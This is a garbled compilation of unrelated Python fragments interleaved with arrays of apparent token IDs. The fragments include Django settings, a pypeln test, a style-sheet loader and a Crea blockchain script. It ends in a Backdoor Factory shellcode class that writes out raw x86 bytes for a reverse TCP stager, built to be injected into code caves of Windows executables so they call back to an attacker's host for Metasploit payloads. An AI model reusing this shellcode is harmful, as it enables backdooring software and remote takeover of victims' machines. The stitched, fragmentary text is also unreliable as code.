'rest_framework.throttling.AnonRateThrottle',
'rest_framework.throttling.UserRateThrottle'
],
'DEFAULT_THROTTLE_RATES': {
'anon': '2/second',
'user': '6/second'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(hours=1),
'ROTATE_REFRESH_TOKENS': False,
'BLACKLIST_AFTER_ROTATION': True,
'UPDATE_LAST_LOGIN': False,
'ALGORITHM': 'HS256',
'SIGNING_KEY': SECRET_KEY,
'VERIFYING_KEY': None,
'AUDIENCE': None,
'ISSUER': None,
'AUTH_HEADER_TYPES': ('Bearer',),
'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
'TOKEN_TYPE_CLAIM': 'token_type',
'JTI_CLAIM': 'jti',
'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(hours=1),
}
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = os.environ.get('TIMEZONE', 'UTC')
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
SWAGGER_SETTINGS = {
'DEFAULT_INFO': 'core.urls.api_info',
'SECURITY_DEFINITIONS': {
'JWT': {
'type': 'apiKey',
'name': 'AUTHORIZATION',
'description': 'JWT authentication',
'in': 'header'
}
}
}
CORS_ORIGIN_WHITELIST = [
os.getenv('CORS_FRONTEND', 'http://localhost:3000')
]
CORS_ALLOW_CREDENTIALS = True
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = os.environ.get('SMTP_SERVER', 'smtp.gmail.com')
EMAIL_PORT = os.environ.get('SMTP_PORT', 587)
EMAIL_HOST_USER = os.environ.get('SMTP_USER', None)
EMAIL_HOST_PASSWORD = os.environ.get('SMTP_PASSWORD', None)
DEFAULT_FROM_EMAIL = EMAIL_HOST_USER
EMAIL_USE_TLS = True
| [
37811,
198,
35,
73,
14208,
6460,
329,
3015,
7983,
1628,
13,
198,
198,
8645,
515,
416,
705,
28241,
14208,
12,
28482,
923,
16302,
6,
1262,
37770,
513,
13,
16,
13,
16,
13,
198,
198,
1890,
517,
1321,
319,
428,
2393,
11,
766,
198,
5450... | 2.21826 | 2,804 |
import pypeln as pl
from copy import copy, deepcopy
# stage = lambda: generator()
stage = [1, 2, 3]
stage = pl.process.map(lambda x: x + 1, stage)
# stage0 = deepcopy(stage)
print(list(stage))
print(list(stage))
print(pl.Element)
| [
11748,
279,
4464,
45542,
355,
458,
198,
6738,
4866,
1330,
4866,
11,
2769,
30073,
628,
198,
198,
2,
3800,
796,
37456,
25,
17301,
3419,
198,
14247,
796,
685,
16,
11,
362,
11,
513,
60,
198,
14247,
796,
458,
13,
14681,
13,
8899,
7,
50... | 2.752941 | 85 |
'''
Defines -
Sheet: a class representing a style sheet object
with attributes such as path and contents.
get_style_sheets: a function that returns a dictionary
with style sheet names as keys and sheet objects as values.
'''
import os
from qtstyles import errors
class Sheet(object):
'''
Keeps key information related to style sheets, particularly the path
and contents as a string.
>>> import os
>>> dirpath = os.path.dirname(os.path.abspath(__file__))
>>> path = os.path.join(dirpath, "style_sheets", "default.qss")
>>> sheet = Sheet(path)
>>> isinstance(sheet.contents, str)
True
'''
def __init__(self, path):
''' This constructor only takes one argument being the sheet path.
path = style sheet file path ending with '.qss'.
'''
if not isinstance(path, str):
raise errors.SheetPathTypeError
if not path.endswith(".qss"):
raise errors.SheetPathValueError
if not os.path.isfile(path):
raise errors.SheetPathFileDoesntExist
self._path = path
self._contents = None # to be loaded on request
@property
def path(self):
''' Collect the path as a sheet attribute. '''
return self._path
@property
def contents(self):
''' The style sheet contents will load only once when needed. '''
if self._contents is None:
self._load_contents()
return self._contents
def _load_contents(self):
''' Loads the style sheet contents (if not already loaded). '''
with open(self.path, "r") as qss_file:
self._contents = qss_file.read()
def get_style_sheets():
'''
Returns a dictionary with the style sheet names as keys and
associated Sheet objects as values.
There must be a sheet called 'default' which is empty.
>>> sheets = get_style_sheets()
>>> isinstance(sheets, dict) # returns a dictionary
True
>>> sheet_object = sheets["default"]
>>> sheet_object.path.endswith(".qss")
True
'''
dirpath = os.path.dirname(os.path.abspath(__file__))
sheets = {}
for name in os.listdir(os.path.join(dirpath, "style_sheets")):
if "__" in name:
# exclude any files with a double underscore
# (e.g. __init__, __pycache__)
continue
path = os.path.join(dirpath, "style_sheets", name)
sheets[name.replace(".qss", "")] = Sheet(path)
return sheets
| [
7061,
6,
201,
198,
7469,
1127,
532,
201,
198,
201,
198,
3347,
316,
25,
257,
1398,
10200,
257,
3918,
9629,
2134,
201,
198,
4480,
12608,
884,
355,
3108,
290,
10154,
13,
201,
198,
201,
198,
1136,
62,
7635,
62,
42011,
25,
257,
2163,
3... | 2.427083 | 1,056 |
from r1 import check,time
import r2
print "Please check either the person is men or women(m/w)"
s = raw_input()
if(s== 'm'):
result = r2.q1.enqueue(check, s)
else:
result = r2.q2.enqueue(check, s)
| [
6738,
374,
16,
1330,
2198,
11,
2435,
198,
11748,
374,
17,
198,
198,
4798,
366,
5492,
2198,
2035,
262,
1048,
318,
1450,
393,
1466,
7,
76,
14,
86,
16725,
198,
82,
796,
8246,
62,
15414,
3419,
198,
361,
7,
82,
855,
705,
76,
6,
2599,... | 2.252632 | 95 |
from django.core.management.base import BaseCommand
from django.core.files.storage import get_storage_class
from cast.utils import storage_walk_paths
| [
6738,
42625,
14208,
13,
7295,
13,
27604,
13,
8692,
1330,
7308,
21575,
198,
6738,
42625,
14208,
13,
7295,
13,
16624,
13,
35350,
1330,
651,
62,
35350,
62,
4871,
198,
198,
6738,
3350,
13,
26791,
1330,
6143,
62,
11152,
62,
6978,
82,
628
] | 3.619048 | 42 |
from .parsing import main_parser
from .time_tracking import start, stop, week, day, current, toggle
if __name__ == "__main__":
arguments = main_parser.parse_args()
if arguments.action == "start":
start()
if arguments.action == "stop":
stop()
if arguments.action == "current":
current()
if arguments.action == "day":
day()
if arguments.action == "week":
week()
if arguments.action == "toggle":
toggle() | [
6738,
764,
79,
945,
278,
1330,
1388,
62,
48610,
198,
6738,
764,
2435,
62,
36280,
1330,
923,
11,
2245,
11,
1285,
11,
1110,
11,
1459,
11,
19846,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
... | 2.583784 | 185 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dateutil import parser
from pytest import approx
import sys
sys.path.append('..')
from dependencies.commitment_intervals import compute_diff, ScheduleAndValue, CommitmentValue
| [
2,
15069,
12131,
3012,
11419,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
733... | 3.84 | 200 |
# from ifm import Enum
import pandas as pd
| [
2,
422,
611,
76,
1330,
2039,
388,
198,
11748,
19798,
292,
355,
279,
67,
198
] | 2.866667 | 15 |
import pyFT
#Comment these line and uncomment the next one to use your own API key
with open('apiKey','r') as f:
apiKey = f.read()
#apiKey =
#Initialize the FTRequest object using your developer key
request = pyFT.FTRequest(apiKey)
#For the main part of your query, you can either set it directly:
request.customQuery("banks")
print(request._build()) #This lines print the body of the html message to stdout
#PRINT: {"queryString":"banks"}
#Or you can use the FTQuerySyntax objects:
query = (pyFT.FTBasic("banks") - pyFT.FTBasic("equity")) + pyFT.FTBasic("finance") * pyFT.FTBasic("credit")
print(query.evaluate())
#PRINT: ((banks AND (NOT equity)) OR (finance AND credit))
#You can then add it to your FTRequest:
request.builtQuery(query)
#To look for particular media, you can use the addCurations method:
request.addCurations(["ARTICLES","BLOGS"])
#The list of allowed curations is available here:
print("Curations: " + ", ".join(pyFT.curations))
#Any other input except an empty string will result in a pyFT.FTError.FTException being raised
#Some fields such as the uuid of the page is automatically sent by the API
#For the most interesting field, you have to specify that you want them to be returned using the 'aspects' field:
request.addAspects(['title','summary','location'])
#Authorized aspects are set here:
print("Aspects: " + ", ".join(pyFT.aspects))
#Some resultContext fields can be set using methods from the FTRequest class:
request.addSortQuery('lastPublishDateTime',DESC=False)
#Here is a list of sortable fields:
print("Sortable: " + ", ".join(pyFT.sortable))
#Not all available fields from the API have their own method.
#They will be implemented little by little, but in the meantime, you can use the addGenericResultContext method
request.addGenericResultContext('maxResults',10,isNumeric=True) #Some generic (i.e. not built-in of the wrapper) result context
#Note that if you are working in the Python interpreter and you want to make sure that your request is correct before sending it, you can print it with the _build method:
print(request._build())
#PRINT: {"queryString":"((banks AND (NOT equity)) OR (finance AND credit))","queryContext":{"curations":["ARTICLES","BLOGS"]},"resultContext":{"sortOrder":"ASC","sortField":"lastPublishDateTime","aspects":["title","summary"],"maxResults":10}}
#Once you are happy with your request, you can call the getResults method:
result = request.getResults()
#This will send you back a HTTPResponse from the httplib library
print(result)
#<http.client.HTTPResponse object at 0xb6ebdbac>
#At this stage, you can either wrap your own class to use the results
#Or you can use the FTResponse class:
FT_ARTICLES = pyFT.FTResponse(result)
#If needed, this class stores your request:
print(FT_ARTICLES.query)
#Print the query
#The results are stored as a list of json instance:
#NB: not a json instance with a list in it
print(FT_ARTICLES.results)
"""
PRINT: (using the __repr__ method)
[Title: FT interview transcript: Robert Zoellick
, Title: Lloyds reveals £201m credit hit
, Title: CDS update: Fundamentally pessimistic
, Title: 'My social life never stops'
, Title: US authorities in Iraq probe phone contracts
, Title: Jonathan Guthrie: Offshoring will hurt
, Title: John Kay: Customer inertia and the active shopper
, Title: ABB names Sulzer boss as new chief executive
, Title: Travel bears brunt of losses
, Title: Measured confidence takes over
]
"""
#Some method will come later. For now, you can return the html link to the article:
print(FT_ARTICLES.results[0].makeHTMLhref('webapp','MyCompany',campaignParameter=True))
#PRINT: http://www.ft.com/cms/be4c9c30-dfef-11de-9d40-00144feab49a.html?FTCamp=engage/CAPI/webapp/Channel_MyCompany//B2B
#If you do not need the campaign parameter (e.g. for test), you can always switch it off
#Warning: this only work if you had the 'location' aspect
print(FT_ARTICLES.results[0].makeHTMLhref('Not','used',campaignParameter=False))
#PRINT: http://www.ft.com/cms/s/0/be4c9c30-dfef-11de-9d40-00144feab49a.html
| [
11748,
12972,
9792,
198,
198,
2,
21357,
777,
1627,
290,
8820,
434,
262,
1306,
530,
284,
779,
534,
898,
7824,
1994,
198,
4480,
1280,
10786,
15042,
9218,
41707,
81,
11537,
355,
277,
25,
198,
220,
220,
220,
40391,
9218,
796,
277,
13,
9... | 3.345199 | 1,208 |
# Sevgilime Notlar:
# rewardü kademeli olarak arttırmak.
# Sunuma 47. satırı koy statelerdeki pixel değişimleri yılana göre.
import tensorflow as tf
import os
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten, BatchNormalization, \
ZeroPadding2D, Dropout
from tensorflow.keras.models import Sequential, load_model
from tensorflow.keras.optimizers import Adam
# from tensorflow.keras.utils import plot_model
import numpy as np
tf.keras.backend.clear_session()
tf.compat.v1.disable_eager_execution()
hello = tf.constant('Hello, TensorFlow!')
sess = tf.compat.v1.Session()
print(sess.run(hello))
# def build_ddqn(lr, n_actions, conv1_dims, conv2_dims, input_dims):
# model = Sequential([
# ZeroPadding2D(padding=(2, 2)),
# Conv2D(conv1_dims, kernel_size=(4, 4), strides=(2, 2), padding="valid", input_shape=input_dims),
# BatchNormalization(),
# Activation('relu'),
# MaxPooling2D(pool_size=(4, 4), strides=(2, 2), padding='same'),
# ZeroPadding2D(padding=(1, 1)),
# Conv2D(conv2_dims, kernel_size=(2, 2), strides=(1, 1), padding="valid"),
# BatchNormalization(),
# Activation('relu'),
# MaxPooling2D(pool_size=(2, 2), strides=(1, 1), padding='same'),
# Flatten(),
# Dense(256, activation='relu'),
# Dense(n_actions, activation='relu')
# ])
#
# model.compile(optimizer=Adam(lr=lr), loss='mse')
# return model
# Weights dosyası yükleme
| [
2,
37918,
37718,
524,
1892,
21681,
25,
198,
2,
6721,
9116,
479,
36920,
43733,
267,
21681,
461,
610,
926,
30102,
26224,
461,
13,
198,
2,
3825,
7487,
6298,
13,
3332,
30102,
81,
30102,
479,
726,
1181,
1754,
67,
39548,
17465,
390,
33133,
... | 2.287234 | 658 |
# Generated by Django 3.1.3 on 2020-11-14 15:51
from django.db import migrations, models
| [
2,
2980,
515,
416,
37770,
513,
13,
16,
13,
18,
319,
12131,
12,
1157,
12,
1415,
1315,
25,
4349,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
628
] | 2.84375 | 32 |
# Copyright 2021 The Private Cardinality Estimation Framework Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for halo_simulator.py."""
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from unittest.mock import patch
from dataclasses import dataclass
from wfa_cardinality_estimation_evaluation_framework.estimators.base import (
EstimateNoiserBase,
)
from wfa_planning_evaluation_framework.data_generators.data_set import DataSet
from wfa_planning_evaluation_framework.data_generators.publisher_data import (
PublisherData,
)
from wfa_planning_evaluation_framework.models.reach_point import ReachPoint
from wfa_planning_evaluation_framework.simulator.halo_simulator import (
HaloSimulator,
MAX_ACTIVE_PUBLISHERS,
)
from wfa_planning_evaluation_framework.simulator.publisher import Publisher
from wfa_planning_evaluation_framework.simulator.privacy_tracker import (
PrivacyBudget,
PrivacyTracker,
NoisingEvent,
DP_NOISE_MECHANISM_DISCRETE_LAPLACE,
)
from wfa_planning_evaluation_framework.simulator.system_parameters import (
LiquidLegionsParameters,
SystemParameters,
)
@dataclass
if __name__ == "__main__":
absltest.main()
| [
2,
15069,
33448,
383,
15348,
25564,
414,
10062,
18991,
25161,
46665,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
... | 3.232775 | 537 |
import math
from typing import Union
import torch
from torch import autograd, nn
| [
11748,
10688,
198,
6738,
19720,
1330,
4479,
198,
198,
11748,
28034,
198,
6738,
28034,
1330,
1960,
519,
6335,
11,
299,
77,
628,
198
] | 3.652174 | 23 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from datetime import datetime, timedelta
import time
import io
import logging
from crea.blockchain import Blockchain
from crea.block import Block
from crea.account import Account
from crea.amount import Amount
from creagraphenebase.account import PasswordKey, PrivateKey, PublicKey
from crea.crea import Crea
from crea.utils import parse_time, formatTimedelta
from creaapi.exceptions import NumRetriesReached
from crea.nodelist import NodeList
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
if __name__ == "__main__":
# stm = Crea(node="https://testnet.timcliff.com/")
# stm = Crea(node="https://testnet.creaitdev.com")
stm = Crea(node="https://nodes.creary.net")
stm.wallet.unlock(pwd="pwd123")
account = Account("creabot", crea_instance=stm)
print(account.get_voting_power())
account.transfer("holger80", 0.001, "CBD", "test")
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
11748,
25064,
198,
6738,
... | 3.023055 | 347 |
import nodeClass
| [
11748,
10139,
9487,
201,
198,
201,
198,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220
] | 1.764706 | 17 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from behavioral_patterns.strategy.hand_signal import get_hand, HandSignal
from behavioral_patterns.strategy.strategy import Strategy
# ˄
# Mirror Strategy: showing a hand signal from the previous opponent's hand signal.
# ˅
# ˄
# ˅
# ˄
# ˅
# ˄
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
220,
135,
227,
198,
6738,
17211,
62,
33279,
82,
13,
2536,
4338,
13,
4993,
62,
12683,
282,
1330,
651,
62,
4993,
1... | 2.302817 | 142 |
version_str = '0.1.2'
| [
9641,
62,
2536,
796,
705,
15,
13,
16,
13,
17,
6,
198
] | 1.833333 | 12 |
#Analyze performeace by Return Breakdown (xy), Annualized_std_dev, Average Annual Return, Sharpe_ratio, BTC_Beta (30d rolling average)
#Return Daily, Cumulative and Overall Summary Matrix
#Author: Ken Lee 2022.02.22
# Import Modules
import pandas as pd
import os
import json
import requests
from dotenv import load_dotenv
import matplotlib.pyplot as plt
import alpaca_trade_api as tradeapi
from pathlib import Path
import sqlalchemy as sql
import CryptoDownloadData as hist
from datetime import date
import logging
from dateutil.relativedelta import relativedelta
import numpy as np
from datetime import date
from datetime import datetime
crypto_data_connection_string = 'sqlite:///./Reference/crypto.db'
| [
2,
37702,
2736,
1620,
68,
558,
416,
8229,
12243,
2902,
357,
5431,
828,
16328,
1143,
62,
19282,
62,
7959,
11,
13475,
16328,
8229,
11,
15465,
431,
62,
10366,
952,
11,
14503,
62,
43303,
357,
1270,
67,
10708,
2811,
8,
198,
2,
13615,
671... | 3.497537 | 203 |
from glycan_profiling.task import TaskBase
from .chromatogram import (get_chromatogram, mask_subsequence)
from .index import ChromatogramFilter
prune_bad_mass_shift_branches = MassShiftTreePruner.prune_bad_mass_shift_branches
| [
6738,
13874,
5171,
62,
5577,
4386,
13,
35943,
1330,
15941,
14881,
198,
198,
6738,
764,
28663,
265,
21857,
1330,
357,
1136,
62,
28663,
265,
21857,
11,
9335,
62,
7266,
43167,
8,
198,
6738,
764,
9630,
1330,
18255,
265,
21857,
22417,
628,
... | 3.108108 | 74 |
'''tools for getting (sometimes astrophysically relevant) plotting colors'''
import colormath.color_objects
import colormath.color_conversions
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as co
def name2color(name):
"""Return the 3-element RGB array of a given color name."""
if '#' in name:
h = name
else:
h = co.cnames[name].lower()
return co.hex2color(h)
def nm2rgb(inputnm, intensity=1.0):
'''Convert a wavelength (or uniform range of wavelengths) into RGB colors usable by Python.'''
if np.min(inputnm) <= 350.0 or np.max(inputnm) >= 800.0:
return 0,0,0
# create an SED, with 10 nm increments
wavelengths = np.arange(340.0, 840.0, 10.0)
intensities = np.zeros_like(wavelengths)
# add monochromatic light, if the input wavelength has only one value
nm = np.round(np.array(inputnm)/10.0)*10.0
which = (wavelengths >= np.min(nm)) & (wavelengths <= np.max(nm))
# wtf are the units of intensity to feed into SpectralColor?
intensities[which]= 5.0/np.sum(which)*intensity
spectral = colormath.color_objects.SpectralColor(*intensities)
rgb = colormath.color_conversions.convert_color(spectral, colormath.color_objects.sRGBColor)
return rgb.clamped_rgb_r, rgb.clamped_rgb_g, rgb.clamped_rgb_b
def monochromaticdemo():
'''Test of nm2rgb, for a single wavelength.'''
n = 1000
x = np.linspace(340, 1000, n)
colors = [nm2rgb(c) for c in x]
plt.ion()
fi, ax = plt.subplots(2,1, sharex=True)
ax[0].plot(x, [c[0] for c in colors], color='red')
ax[0].plot(x, [c[1] for c in colors], color='green')
ax[0].plot(x, [c[2] for c in colors], color='blue')
ax[1].scatter(x, np.random.normal(0,1,n), color= colors, s=100)
ax[1].set_xlim(min(x), max(x))
ax[1].set_xlabel('Wavelength (nm)')
def broadbanddemo(width=50):
'''Test of nm2rgb, for a range of wavelengths.'''
n = 1000
x = np.linspace(340, 1000, n)
colors = [nm2rgb([c-width, c+width]) for c in x]
plt.ion()
plt.cla()
fi, ax = plt.subplots(2,1, sharex=True)
ax[0].plot(x, [c[0] for c in colors], color='red')
ax[0].plot(x, [c[1] for c in colors], color='green')
ax[0].plot(x, [c[2] for c in colors], color='blue')
ax[1].scatter(x, np.random.normal(0,1,n), color= colors, s=100)
ax[1].set_xlim(min(x), max(x))
| [
7061,
6,
31391,
329,
1972,
357,
29810,
48782,
893,
1146,
5981,
8,
29353,
7577,
7061,
6,
198,
198,
11748,
951,
579,
776,
13,
8043,
62,
48205,
198,
11748,
951,
579,
776,
13,
8043,
62,
1102,
47178,
198,
11748,
2603,
29487,
8019,
13,
90... | 2.415155 | 937 |
import csv
from ruta import get_file_path
| [
11748,
269,
21370,
198,
198,
6738,
374,
29822,
1330,
651,
62,
7753,
62,
6978,
198
] | 2.866667 | 15 |
from rest_framework.permissions import BasePermission, IsAuthenticated
from media_management_api.media_service.models import CourseUser, UserProfile
import logging
logger = logging.getLogger(__name__)
SAFE_METHODS = ('GET', 'HEAD', 'OPTIONS')
| [
6738,
1334,
62,
30604,
13,
525,
8481,
1330,
7308,
5990,
3411,
11,
1148,
47649,
3474,
198,
6738,
2056,
62,
27604,
62,
15042,
13,
11431,
62,
15271,
13,
27530,
1330,
20537,
12982,
11,
11787,
37046,
198,
198,
11748,
18931,
198,
6404,
1362,
... | 3.402778 | 72 |
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import struct
from intelmodules import eat_code_caves
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE\x22\x01\x00\x00" # <---Size of shellcode2 in hex
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += ("\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
